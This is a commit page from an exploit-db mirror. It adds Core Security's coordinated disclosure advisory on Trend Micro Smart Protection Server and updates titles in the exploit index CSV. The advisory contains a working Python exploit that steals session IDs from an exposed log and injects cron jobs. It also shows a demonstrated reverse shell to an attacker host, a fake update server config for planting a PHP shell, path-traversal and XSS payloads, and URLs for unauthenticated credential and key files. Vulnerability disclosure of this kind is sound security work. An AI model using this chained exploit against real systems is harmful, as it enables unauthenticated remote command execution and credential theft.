bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-23

Browse source 
5 changes to exploits/shellcodes

Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)

Broadcom BCM4325 and BCM4329 Devices - Denial of Service
Broadcom BCM4325 / BCM4329 Devices - Denial of Service

Armadito Antimalware - Backdoor/Bypass
Armadito Antimalware - Backdoor Access/Bypass

Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Local Stack Buffer Overflow
Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow

Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1  - 'set_dp_control_port' Lack of Locking Use-After-Free
Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1 - 'set_dp_control_port' Lack of Locking Use-After-Free

PHPMailer < 5.2.21 - Local File Disclosure

MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor
MODACOM URoad-5000 1450 - Remote Command Execution / Backdoor Access

Cisco IOS 12.2 < 12.4 /  15.0 < 15.6 - Security Association Negotiation Request Device Memory
Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor
Netcore / Netis Routers - UDP Backdoor
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access
Netcore / Netis Routers - UDP Backdoor Access
Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control

Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)
Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)

Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor
Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor Access

MyBB 1.6.4 - Backdoor (Metasploit)
MyBB 1.6.4 - Backdoor Access (Metasploit)

8 TOTOLINK Router Models - Backdoor / Remote Code Execution
8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution

PHPMailer < 5.2.21 - Local File Disclosure
This commit is contained in:
Offensive Security 2017-12-23 05:02:17 +00:00
parent f0d075a5de
commit 0fcc4af85c
4 changed files with 431 additions and 15 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

413
exploits/multiple/remote/43388.md Normal file
View file

@ -0,0 +1,413 @@
# Trend Micro Smart Protection Server Multiple Vulnerabilities
## 1. Advisory Information
**Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities
**Advisory ID:** CORE-2017-0008
**Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities
**Date published:** 2017-12-19
**Date of last update:** 2017-12-11
**Vendors contacted:** Trend Micro
**Release mode:** Coordinated release
## 2. Vulnerability Information
**Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** Yes
**CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)
## 3. Vulnerability Description
Trend Micro's website states that:
Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server.
Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system.
## 4. Vulnerable Packages
* Trend Micro Smart Protection Server 3.2 (Build 1085)
Other products and versions might be affected, but they were not tested.
## 5. Vendor Information, Solutions and Workarounds
Trend Micro published the following patches:
* TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628))
* TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030))
## 6. Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
## 7. Technical Description / Proof of Concept Code
In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application.
Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application.
Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges.
Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console.
### 7.1 Session hijacking via log file disclosure
[[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format:
```
2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null,
Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218
```
Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests.
### 7.2 Remote command execution via cron job injection
[[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter.
File /var/www/AdminUI/php/admin_update_program.php:
```
if ($_SERVER['REQUEST_METHOD'] == 'POST'){
[...]
$arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0";
[...]
if ( $arr_au['Program']['UseAUSchedule'] == "1"){
if ( $arr_au['Program']['AUScheduleType'] == "0" ){
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*");
}else {
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']);
}
$crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1");
$crontab->saveCronFile();
}
if(! $crontab->addToCrontab()){
header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ;
exit;
}
```
File /var/www/AdminUI/php/inc/crontab.php:
```
function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){
if($min=="0")
$this->minute=0;
elseif($min)
$this->minute=$min;
else
$this->minute="*";
if($hour=="0")
$this->hour=0;
elseif($hour)
$this->hour=$hour;
else
$this->hour="*";
$this->month=($month) ? $month : "*";
$this->day=($day) ? $day : "*";
$this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*";
}
function saveCronFile(){
$command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n";
if(!fwrite($this->handle, $command))
return true;
else
return false;
}
function addToCrontab(){
if(!$this->filename)
exit('No name specified for cron file');
$data=array();
exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret);
if($ret==0)
return true;
else
return false;
}
```
The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication.
```
#!/usr/bin/env python
import requests
import sys
def exploit(host, port, command):
session_id = get_session_id(host, port)
print "[+] Obtained session id %s" % session_id
execute_command(session_id, host, port, command)
def get_session_id(host, port):
url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port)
r = requests.get(url, verify=False)
for line in r.text.split('n')[::-1]:
if "INFO" in line or "ERROR" in line:
return line.split(',')(http://cwe.mitre.org/data/definitions/98.html)
def execute_command(session_id, host, port, command):
print "[+] Executing command '%s' on %s:%d" % (command, host, port)
url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id)
multipart_data = {
"ComponentSchedule": "on",
"ComponentScheduleOS": "on",
"ComponentScheduleService": "on",
"ComponentScheduleWidget": "on",
"useAUSchedule": "on",
"auschedule_setting": "1",
"update_method": "1",
"update_method3": "on",
"userfile": "",
"sid": session_id,
"hidComponentScheduleOS": "1",
"hidComponentScheduleService": "1",
"hidComponentScheduleWidget": "1",
"hidUseAUSchedule": "1",
"hidScheduleType": "1",
"hidTimingDay": "2",
"hidTimingHour": "2",
"hidTimingMin": "* * * * * %s #" % command,
"hidUpdateOption": "1",
"hidUpdateNowFlag": ""
}
r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False)
if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text:
print "[+] Cron job added, enjoy!"
else:
print "[-] Session has probably timed out, try again later!"
if __name__ == "__main__":
exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html))
```
The following proof of concept opens a reverse shell to the attacker's machine.
```
$ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1'
[+] Obtained session id q514un6ru6stcpf3k0n4putbd3
[+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343
[+] Cron job added, enjoy!
$ nc -lvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508)
bash: no job control in this shell
[webserv@ localhost ~]$
```
### 7.3 Remote command execution via local file inclusion
[[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename.
File /var/www/AdminUI/widget/inc/widget_package_manager.php:
```
switch($widgetRequest['act']){
case "check":
try{
// $strUpdateType = widget, configure_widget_and_widget_component
$strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget';
$strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update';
$isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName();
[...]
```
File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php:
```
public function getWidgetPoolManager($strUpdateType = 'widget'){
if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){
$strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType);
require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php');
$strClassName = 'WF'.$strFileName.'PoolManager';
self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework);
}
return self::$instance[__FUNCTION__][$strUpdateType];
}
```
One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console.
Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive.
As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate:
```
; =======================================
; ActiveUpdate 1.2 US
;
; Filename: Server.ini
;
; New Format AU 1.8
;
; Last modified by AUJP1 10/14/2015
; =======================================
[Common]
Version=1.2
CertExpireDate=Jul 28 08:52:40 2019 GMT
[Server]
AvailableServer=1
Server.1=http://<serverIP>:1080/
AltServer=http://<serverIP>:1080/
Https=http://<serverIP>:1080/
[PATTERN]
P.48040039=pattern/bf1747402402.zip,1747402402,257
```
After triggering an update from the Web console, the PHP script is written to the expected location.
```
[root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php
-rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php
```
The final step is to include the script and execute our payload.
```
POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1
Host: 192.168.45.186:4343
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Request: JSON
X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7
Content-Type: application/json; charset=utf-8
Content-Length: 122
Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7
Connection: close
{"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"}
```
Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges.
### 7.4 Stored cross-site scripting
[[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs.
After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section.
The following proof of concept stores code to open an alert box.
```
https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn=
```
### 7.5 Improper access control
[[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL:
```
https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db
```
The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication.
```
https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key
```
This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless.
## 8 Report Timeline
* **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory.
* **2017-10-02: **Core Security asked for an update on the vulnerability reported.
* **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October)
* **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished.
* **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA.
* **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date.
* **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities.
* **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th.
* **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST.
* **2017-12-19: ** Advisory CORE-2017-0008 published.
## 9 References
http://cwe.mitre.org/data/definitions/532.html
## 10 About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: .
## 11 About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](mailto:info%40coresecurity.com)
## 12 Disclaimer
The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:

0
exploits/php/local/43056.py → exploits/php/webapps/43056.py
View file

4
exploits/windows/webapps/43379.txt
View file

@ -46,4 +46,6 @@ Critical
Description:
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] BEIMS ContractorWeb .NET System 5.18.0.0
Vulnerable Product: [+] BEIMS ContractorWeb .NET System 5.18.0.0
Reference: https://becomepentester.blogspot.ae/2017/12/ZUUSE-BEIMS-ContractorWeb-SQLInjection-CVE-2017-17721.html

29
files_exploits.csv
View file

@ -1005,7 +1005,7 @@ id,file,description,date,author,type,platform,port
8402,exploits/windows/dos/8402.pl,"Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8403,exploits/windows/dos/8403.pl,"WM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8404,exploits/windows/dos/8404.pl,"RM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8405,exploits/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8405,exploits/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8406,exploits/openbsd/dos/8406.txt,"OpenBSD 4.5 - IP datagrams Remote Denial of Service",2009-04-13,Rembrandt,dos,openbsd,
8407,exploits/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,dos,windows,
8429,exploits/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,dos,multiple,
@ -2894,7 +2894,7 @@ id,file,description,date,author,type,platform,port
22706,exploits/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote 'Username' Format String",2003-06-02,"Luca Ercoli",dos,windows,
22707,exploits/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",dos,windows,
22718,exploits/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,dos,windows,
22739,exploits/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,dos,hardware,
22739,exploits/hardware/dos/22739.py,"Broadcom BCM4325 / BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,dos,hardware,
22749,exploits/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",dos,novell,
22757,exploits/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service Vulnerabilities",2003-06-11,posidron,dos,windows,
22759,exploits/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",dos,windows,
@ -5165,7 +5165,7 @@ id,file,description,date,author,type,platform,port
39877,exploits/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",dos,multiple,
39882,exploits/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",dos,multiple,
39906,exploits/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,dos,multiple,
39915,exploits/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,dos,windows,
39915,exploits/windows/dos/39915.c,"Armadito Antimalware - Backdoor Access/Bypass",2016-06-10,Ax.,dos,windows,
39920,exploits/osx/dos/39920.c,"Apple Mac OSX Kernel - Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",dos,osx,
39921,exploits/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",dos,android,
39922,exploits/osx/dos/39922.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",dos,osx,
@ -6942,7 +6942,7 @@ id,file,description,date,author,type,platform,port
14497,exploits/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Local Buffer Overflow (SEH)",2010-07-28,fdiskyou,local,windows,
14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios,
14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
@ -9186,7 +9186,7 @@ id,file,description,date,author,type,platform,port
40902,exploits/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",local,windows,
40903,exploits/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)",2016-12-10,malwrforensics,local,windows,
40921,exploits/linux/local/40921.sh,"Nagios < 4.2.4 - Local Privilege Escalation",2016-12-15,"Dawid Golunski",local,linux,
40931,exploits/multiple/local/40931.txt,"Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1 - 'set_dp_control_port' Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",local,multiple,
40931,exploits/multiple/local/40931.txt,"Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1 - 'set_dp_control_port' Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",local,multiple,
40937,exploits/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",local,linux,
40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)",2016-12-18,"Hacker Fantastic",local,linux,
40943,exploits/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
@ -9382,7 +9382,6 @@ id,file,description,date,author,type,platform,port
43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,local,windows,
43029,exploits/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation",2017-10-22,"@XeR_0x2A & @chaign_c",local,linux,
43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,local,windows,
43056,exploits/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",local,php,
43057,exploits/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,local,windows,
43104,exploits/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",local,windows,
43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",local,windows,
@ -11700,7 +11699,7 @@ id,file,description,date,author,type,platform,port
17352,exploits/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)",2011-05-30,Metasploit,remote,windows,
17354,exploits/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,remote,windows,
17355,exploits/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,remote,windows,21
17356,exploits/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",remote,hardware,
17356,exploits/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution / Backdoor Access",2011-06-02,"Alex Stanev",remote,hardware,
17359,exploits/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,remote,windows,
17361,exploits/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous",remote,windows,
17365,exploits/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM",2011-06-07,"Jeremy Brown",remote,windows,
@ -15863,10 +15862,11 @@ id,file,description,date,author,type,platform,port
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android,
43383,exploits/hardware/remote/43383.py,"Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory",2017-03-17,nixawk,remote,hardware,
43383,exploits/hardware/remote/43383.py,"Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory",2017-03-17,nixawk,remote,hardware,
43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,
43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor",2016-01-09,operator8203,remote,linux,
43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor",2016-12-15,nixawk,remote,hardware,53413
43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -15992,7 +15992,7 @@ id,file,description,date,author,type,platform,port
42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java,
42703,exploits/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,
42704,exploits/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",remote,windows,
42708,exploits/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",remote,linux,40007
42708,exploits/linux/remote/42708.rb,"Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)",2017-09-13,"James Fitts",remote,linux,40007
